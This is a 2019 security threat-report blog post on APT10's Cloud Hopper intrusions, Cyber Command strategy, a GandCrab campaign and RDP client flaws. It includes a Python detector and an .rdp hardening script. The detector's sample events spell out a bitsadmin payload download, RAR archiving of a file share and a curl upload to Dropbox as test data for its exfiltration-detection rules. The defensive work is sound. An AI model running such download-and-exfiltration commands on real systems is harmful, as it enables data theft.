Paul Scott

on February 6, 2019

Threat Report Wednesday February 6th 2019

This week we learn about APT10’s modus operandi in Operation Cloud Hopper, how U.S. Cyber Command plans to respond to such foreign campaigns, GoDaddy DNS server’s wild ride with GandCrab, and 16 major RDP vulnerabilities.

More details on Stone Panda’s (APT10) Cloud Hopper

A cyber-espionage campaign targeting at least three companies in the United States and Europe between November 2017 and September 2018 was brought to light in data published by Recorded Future and Rapid7. Based on the technical data discovered, the researchers are highly confident that these incidents were conducted by APT10 (also known as Stone Panda or CVNX) in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage.

The targeted companies include:

  • An IT and business cloud services managed service provider (MSP)
  • An international apparel company
  • A U.S. law firm with strong experience in intellectual property law with clients in the pharmaceutical, technology, electronics, biomedical, and automotive sectors, among others

In all three incidents, the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials. We see once again how dangerous password reuse and/or the lack of two-factor authentication can be.

The attackers then enumerated access and conducted privilege escalation on the victim networks, utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware.

APT10 Indictment

During the Visma intrusion, APT10 deployed RedLeaves malware with command and control (C2) communications encrypted using both the RC4 and Salsa20 stream ciphers. On the two other victim networks, the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor, used only by APT10. The backdoor was deployed using the Notepad++ updater and sideloading of a malicious DLL, as noted in APT10’s targeting of Japanese corporations in July 2018.

The attackers transferred malware and tooling from their C2 using BITSAdmin-scheduled tasks into the ‘C:\ProgramData\temp’ directory on the victim networks. APT10 actors then compressed proprietary data from Visma with WinRAR (deployed by the attackers) and exfiltrated it to Dropbox using cURL. The same Dropbox account was accessed by the attackers during the apparel company intrusion. Dropbox was also used to store exfiltrated documents from the third victim, a U.S. law firm, with the files again exfiltrated using identical TTPs and uploaded using cURL for Windows.
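The staging-and-exfiltration chain above (BITSAdmin download into C:\ProgramData\temp, WinRAR archiving, cURL upload to Dropbox) is what a detection engineer would want to alert on. The following is an added example, not code from the report or from Recorded Future/Rapid7: it runs three simple rules over constructed process-creation events and flags hosts where the whole chain is present. The event fields, host names and URLs are made up.

```python
import re

# Constructed sample process-creation events (not real telemetry); the fields
# mirror what an EDR or Sysmon Event ID 1 record carries. ws02 is benign noise.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high "
                r"http://203.0.113.5/x.dat C:\ProgramData\temp\x.dat"},
    {"host": "ws01", "image": r"C:\ProgramData\temp\Rar.exe",
     "cmdline": r"Rar.exe a -r -hp C:\ProgramData\temp\out.rar \\fs01\projects"},
    {"host": "ws01", "image": r"C:\ProgramData\temp\curl.exe",
     "cmdline": r"curl.exe -X POST https://content.dropboxapi.com/2/files/upload "
                r"--data-binary @C:\ProgramData\temp\out.rar"},
    {"host": "ws02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer update /download "
                r"http://updates.example.com/patch.msi C:\Users\alice\patch.msi"},
]

# Each rule is (name, predicate over one event). They are deliberately narrow:
# the staging directory and the Dropbox upload are the page's own TTPs.
RULES = [
    ("bits_download_to_programdata_temp",
     lambda e: e["image"].lower().endswith(r"\bitsadmin.exe")
               and "/transfer" in e["cmdline"].lower()
               and r"c:\programdata\temp" in e["cmdline"].lower()),
    ("rar_archive_created",
     lambda e: re.search(r"\\(rar|winrar)\.exe$", e["image"], re.I) is not None
               and e["cmdline"].split()[1:2] == ["a"]),   # 'a' = add to archive
    ("curl_upload_to_dropbox",
     lambda e: e["image"].lower().endswith(r"\curl.exe")
               and "dropbox" in e["cmdline"].lower()
               and any(f in e["cmdline"].lower()
                       for f in ("-x post", "--upload-file", "--data-binary", "-t "))),
]

def evaluate(events):
    """Return (host, rule_name) for every event that matches a rule."""
    return [(e["host"], name) for e in events for name, pred in RULES if pred(e)]

def hosts_with_full_chain(events):
    """Hosts on which download staging, archiving and Dropbox upload all fired."""
    needed = {name for name, _ in RULES}
    seen = {}
    for host, name in evaluate(events):
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items() if needed <= names)

if __name__ == "__main__":
    for host, rule in evaluate(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
    print("full chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

Individually each rule will produce some benign hits (BITS is used by legitimate updaters, as the ws02 event shows); the chain-level view is what raises the signal above that noise.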

APT10 is believed to be the most significant Chinese state-sponsored cyber threat to global corporations known to date. APT10 has conducted a number of campaigns since 2016, and we now know they are run by the Chinese intelligence agency, the Ministry of State Security (MSS).

Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd, the MSS has conducted “Operation Cloud Hopper” against managed IT service providers (MSPs), designed to steal intellectual property and enable secondary attacks against their clients. Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds, if not thousands, of corporations around the world. APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks, not of stealing Visma intellectual property.

In all three incidents, APT10 actors used previously acquired legitimate credentials (possibly gained via a third-party supply chain compromise) in order to gain initial access to the law firm and the apparel company.

Transformational hacking moment for U.S. Cyber Command

On February 6, 2019, RealClear released a report on a new, more aggressive strategy for taking down cyber actors in response to the high-profile attacks on the United States. The U.S. is no longer just playing defense.

Gen. Paul Nakasone, commander of the U.S. Cyber Command, described a “transformational moment” in how the U.S. conducts cyber operations to raise the cost adversaries incur from attacking the United States. Nakasone did not reveal the details of the new strategy; however, he stated that it involves targeting the infrastructure of adversary cyber actors, hurting their ability to target American interests in the virtual world. Nakasone referenced an operation against ISIS by Joint Task Force Ares to take down the group’s communications and propaganda tooling.

Nakasone also revealed a partnership between the U.S. Cyber Command and the NSA which helped to secure the 2018 midterm elections against Russian interference. U.S. Cyber Command learned that techniques and tradecraft must evolve to keep pace with adversaries. No indicators of compromise were released with the report.

GandCrab smash and grab with GoDaddy’s help

A large-scale GandCrab ransomware campaign was assisted by a security hole in GoDaddy DNS. GandCrab is a common ransomware family discovered in 2018. Researchers noticed that the attacks were being launched through compromised DNS records, and once the exploit executed, the actors delivered GandCrab ransomware to the compromised target system. Researchers disclosed two phishing email themes used in this campaign: DHL Delivers and E-fax messages. We checked our data over the last 30 days and saw a few organizations receive these emails. If you were affected, we have reached out to you.

So many RDP vulnerabilities!

Check Point researchers have discovered 25 vulnerabilities, 16 of them critical, in commonly used Remote Desktop Protocol (RDP) clients that would allow a malicious actor to reverse the usual direction of communication: a malicious RDP server infects the computer of the user connecting to it. That infection would allow an intrusion into the connecting user’s network as a whole. And yes, our data confirms that many organizations still allow access to RDP from the outside world.

I can imagine a scenario where someone hijacks the DNS for your RDP servers and infects all the clients that try to connect. But this would be cool for a hack-back honeypot too, which reminds me of Wes’ blog post on forcing the pain back to the bad guys.

In one of the vulnerabilities, when the “copy & paste” feature is used while connected to a malicious RDP server, the server can use the shared RDP clipboard to send files to the client’s computer.

As described by the research team, a potential attacker could use this vulnerability in the Remote Desktop Connection to drop arbitrary malicious scripts or programs to a user’s Startup folder, which would be automatically executed during the next reboot of the client computer.

This did not meet Microsoft’s bar for acknowledgement, and no patch is planned. Check Point researchers recommend that you turn off the shared RDP clipboard while using RDP.
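The recommendation above maps to a concrete client setting: saved mstsc connection files (.rdp) carry `redirectclipboard:i:1` when the clipboard is shared. The following is an added example, not code from Check Point or from this report: it parses a constructed .rdp file, reports which redirection settings are still enabled, and emits a hardened copy. The `name:type:value` line format and the `redirectclipboard`/`drivestoredirect` keys are real mstsc settings; the host and user names are made up.

```python
# Constructed example of a saved mstsc connection file (.rdp). The line format
# "name:type:value" is the real one; the host and user values are made up.
WEAK_RDP_FILE = """\
full address:s:rdp.partner.example:3389
username:s:alice
redirectclipboard:i:1
drivestoredirect:s:*
prompt for credentials:i:1
"""

# Redirection settings a client should turn off before connecting to a server
# it does not control, with the value that disables each. redirectclipboard is
# the one the Check Point advice targets; drive redirection is included because
# it also hands the server a path into the client's file system.
RISKY_SETTINGS = {
    "redirectclipboard": ("i", "0"),  # 1 = clipboard shared with the server
    "drivestoredirect": ("s", ""),    # non-empty = local drives exposed
}

def parse_rdp(text):
    """Parse 'name:type:value' lines into {name: (type, value)}, keeping order.
    maxsplit=2 keeps colons inside the value (e.g. host:port) intact."""
    settings = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, kind, value = line.split(":", 2)
        settings[name] = (kind, value)
    return settings

def audit_rdp(text):
    """Return a finding string for each risky setting that is not disabled."""
    settings = parse_rdp(text)
    findings = []
    for name, (_, safe_value) in RISKY_SETTINGS.items():
        if name not in settings:
            findings.append(f"{name}: not explicitly disabled")
        elif settings[name][1] != safe_value:
            findings.append(f"{name}: enabled ({settings[name][1]})")
    return findings

def harden_rdp(text):
    """Rewrite the file with every risky redirection setting forced off."""
    settings = parse_rdp(text)
    for name, (kind, safe_value) in RISKY_SETTINGS.items():
        settings[name] = (kind, safe_value)
    return "".join(f"{n}:{k}:{v}\n" for n, (k, v) in settings.items())

if __name__ == "__main__":
    print("findings:", audit_rdp(WEAK_RDP_FILE))
    print(harden_rdp(WEAK_RDP_FILE))
```

Note that the same clipboard setting can also be toggled in the mstsc “Local Resources” tab; auditing the saved files catches connections users launch by double-clicking an .rdp file rather than through the dialog.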
